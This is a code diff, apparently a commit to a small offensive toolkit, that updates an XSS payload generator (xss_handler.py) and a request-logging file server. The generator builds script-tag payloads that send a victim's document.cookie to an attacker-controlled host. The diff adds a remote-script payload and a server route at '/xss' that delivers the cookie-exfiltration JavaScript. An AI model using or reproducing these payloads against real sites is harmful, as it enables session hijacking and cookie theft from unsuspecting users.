xss_handler + fileserver update

fileserver.py

@@ -50,6 +50,7 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
                 body = self.rfile.read(int(contentLength))
 
             print("==========")
+            print("%s %s %s" % (self.command, self.path, self.request_version))
             print(str(self.headers).strip())
             if body:
                 print()

xss_handler.py

@@ -6,11 +6,16 @@ import http.server
 import socketserver
 from http.server import HTTPServer, BaseHTTPRequestHandler
 
-def getCookieAddress(address, port):
+# returns http address
+def getServerAddress(address, port):
     if port == 80:
-        return "'http://%s/?x='+document.cookie" % address
+        return "http://%s" % address
     else:
-        return "'http://%s:%d/?x='+document.cookie" % (address, port)
+        return "http://%s:%d" % (address, port)
+
+# returns js code: 'http://xxxx:yy/?x='+document.cookie
+def getCookieAddress(address, port):
+    return "'%s/?x='+document.cookie" % getServerAddress(address, port)
 
 def generatePayload(type, address, port):
 
@@ -23,6 +28,7 @@ def generatePayload(type, address, port):
 
     if type == "script":
         payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress)
+        payloads.append('<script src="%s/xss" />' % getServerAddress(address, port))
 
     if len(payloads) == 0:
         return None
@@ -41,6 +47,10 @@ class XssServer(BaseHTTPRequestHandler):
 
     def do_GET(self):
         self._set_headers()
+        if self.path == "/xss":
+            cookie_addr = getCookieAddress(util.getAddress(), listen_port)
+            self.wfile.write(cookie_addr.encode())
+        else:
             self.wfile.write(self._html())
 
     def do_HEAD(self):